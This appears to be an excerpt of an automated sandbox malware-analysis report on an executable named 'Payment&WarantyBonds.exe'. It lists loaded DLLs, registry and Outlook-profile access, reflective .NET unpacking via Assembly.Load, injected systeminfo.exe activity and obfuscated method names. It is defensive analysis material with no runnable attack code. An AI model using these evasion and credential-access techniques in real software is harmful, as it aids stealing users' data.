                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.39e0b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.72d0000.3.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 0_2_0B1504E8 push esp; ret 0_2_0B1504E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040185B pushfd ; retf 2_2_0040187E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00426833 push edi; ret 2_2_0042683E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004148C0 push esp; retf 2_2_004148C1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004018BC pushad ; ret 2_2_004018D2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004031B0 push eax; ret 2_2_004031B2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004139BA pushfd ; ret 2_2_004139BB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041AA77 push edx; iretd 2_2_0041AA86
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00418304 push eax; ret 2_2_00418305
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417BD1 push esi; ret 2_2_00417BDA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0040D3BF push edx; ret 2_2_0040D3DA
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00422562 push ss; retn 0000h2_2_0042256A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417E58 push ss; retf 2_2_00417E8D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041A6CB push edi; retf 2_2_0041A6DC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00401F0B pushfd ; retf 2_2_00401F0C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041771B push esi; ret 2_2_0041771D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0041473C push edi; retf 2_2_0041473E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_004117B1 push ss; iretd 2_2_004117C5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014209AD push ecx; mov dword ptr [esp], ecx2_2_014209B6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047327FA pushad ; ret 7_2_047327F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473225F pushad ; ret 7_2_047327F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0473283D push eax; iretd 7_2_04732858
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047609AD push ecx; mov dword ptr [esp], ecx7_2_047609B6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005710D9 push ss; retf 7_2_0057116B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E25E push edx; retf 7_2_0055E25D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E200 push edx; retf 7_2_0055E25D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00564568 push esi; ret 7_2_0056456A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055E5FE push ss; iretd 7_2_0055E612
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00562607 pushfd ; ret 7_2_00562608
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00560807 pushfd ; ret 7_2_00560808
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00564A1E push esi; ret 7_2_00564A27
                Source: Payment&WarantyBonds.exeStatic PE information: section name: .text entropy: 7.95788200827039
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
